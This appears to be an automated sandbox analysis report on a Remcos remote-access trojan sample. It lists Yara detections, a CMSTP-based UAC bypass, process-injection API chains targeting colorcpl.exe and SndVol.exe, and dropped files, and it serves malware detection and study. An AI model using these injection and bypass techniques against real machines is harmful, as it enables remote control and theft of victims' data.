                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467CA73 SystemParametersInfoW,8_2_0467CA73
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041CA6D SystemParametersInfoW,17_2_0041CA6D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041CA73 SystemParametersInfoW,17_2_0041CA73
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513D788 SystemParametersInfoW,17_2_0513D788
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513D78E SystemParametersInfoW,17_2_0513D78E

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,0_2_0289B118
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02897A2C NtAllocateVirtualMemory,0_2_02897A2C
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0289DC8C
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0289DC04
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02897D78 NtWriteVirtualMemory,0_2_02897D78
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0289DD70
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028984C8 NtProtectVirtualMemory,0_2_028984C8
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02897A2A NtAllocateVirtualMemory,0_2_02897A2A
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0289DBB0
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02898D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02898D6E
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02898D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02898D70
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B164CA NtQueryInformationToken,5_2_00B164CA
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B1643A NtOpenThreadToken,NtOpenProcessToken,NtClose,5_2_00B1643A
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B14823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,5_2_00B14823
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B27460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,5_2_00B27460
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B2C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,5_2_00B2C1FA
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B2A135 NtSetInformationFile,5_2_00B2A135
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B16500 NtQueryInformationToken,NtQueryInformationToken,5_2_00B16500
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B04E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,5_2_00B04E3B
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B14759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,5_2_00B14759
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B164CA NtQueryInformationToken,10_2_00B164CA
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B1643A NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00B1643A
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B14823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00B14823
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B27460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00B27460
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B2C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00B2C1FA
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B2A135 NtSetInformationFile,10_2_00B2A135
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B16500 NtQueryInformationToken,NtQueryInformationToken,10_2_00B16500
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B04E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,10_2_00B04E3B
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B14759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,10_2_00B14759
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_0281B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,16_2_0281B118
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_02817A2C NtAllocateVirtualMemory,16_2_02817A2C
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_0281DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,16_2_0281DD70
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_02817D78 NtWriteVirtualMemory,16_2_02817D78
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_028184C8 NtProtectVirtualMemory,16_2_028184C8
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_02817A2A NtAllocateVirtualMemory,16_2_02817A2A
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_0281DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_0281DBB0
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_0281DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,16_2_0281DC8C
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_0281DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_0281DC04
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_02818D6E Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,16_2_02818D6E
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_02818D70 Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,16_2_02818D70
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513E33B NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,17_2_0513E33B
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B04C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,5_2_00B04C10
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028A8128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_028A8128
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046767EF ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_046767EF
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_004167EF
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513750A ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_0513750A
                  Source: C:\Users\Public\alpha.pifFile created: C:\WindowsJump to behavior
                  Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64Jump to behavior
                  Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64Jump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028820C40_2_028820C4
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028AE5960_2_028AE596
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288C95F0_2_0288C95F
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B074B15_2_00B074B1
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B04C105_2_00B04C10
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B0540A5_2_00B0540A
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B148755_2_00B14875
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B241915_2_00B24191
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B2695A5_2_00B2695A
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B091445_2_00B09144
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B13EB35_2_00B13EB3
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B2769E5_2_00B2769E
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B15A865_2_00B15A86
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B14EC15_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B07A345_2_00B07A34
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B0EE035_2_00B0EE03
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B0D6605_2_00B0D660
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B23E665_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B06E575_2_00B06E57
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B10BF05_2_00B10BF0
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B06B205_2_00B06B20
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B107405_2_00B10740
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0468742E8_2_0468742E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046975668_2_04697566
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469E5A88_2_0469E5A8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046987F08_2_046987F0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469706A8_2_0469706A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046740058_2_04674005
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469E11C8_2_0469E11C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046981E88_2_046981E8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046B41D98_2_046B41D9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467F18B8_2_0467F18B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046A62708_2_046A6270
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469E34B8_2_0469E34B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046B33AB8_2_046B33AB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04687C408_2_04687C40
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04697DB38_2_04697DB3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04695EEB8_2_04695EEB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469DEED8_2_0469DEED
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04686E9F8_2_04686E9F
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469797E8_2_0469797E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046939D78_2_046939D7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046ADA498_2_046ADA49
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04687AD78_2_04687AD7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467DBF38_2_0467DBF3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_067346F28_2_067346F2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_067386998_2_06738699
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0674E7648_2_0674E764
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_067287F28_2_067287F2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0673950B8_2_0673950B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0673F2C38_2_0673F2C3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_067382818_2_06738281
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0673F0668_2_0673F066
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_067540C68_2_067540C6
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_067281498_2_06728149
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0673EE378_2_0673EE37
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06738F038_2_06738F03
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06746F8B8_2_06746F8B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06736C068_2_06736C06
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0673EC088_2_0673EC08
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06714D208_2_06714D20
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06737D858_2_06737D85
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06738ACE8_2_06738ACE
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06727BBA8_2_06727BBA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0672895B8_2_0672895B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0671E90E8_2_0671E90E
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B074B110_2_00B074B1
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B04C1010_2_00B04C10
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B0540A10_2_00B0540A
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B1487510_2_00B14875
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B2419110_2_00B24191
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B2695A10_2_00B2695A
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B0914410_2_00B09144
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B13EB310_2_00B13EB3
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B2769E10_2_00B2769E
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B15A8610_2_00B15A86
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B14EC110_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B07A3410_2_00B07A34
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B0EE0310_2_00B0EE03
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B0D66010_2_00B0D660
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B23E6610_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B06E5710_2_00B06E57
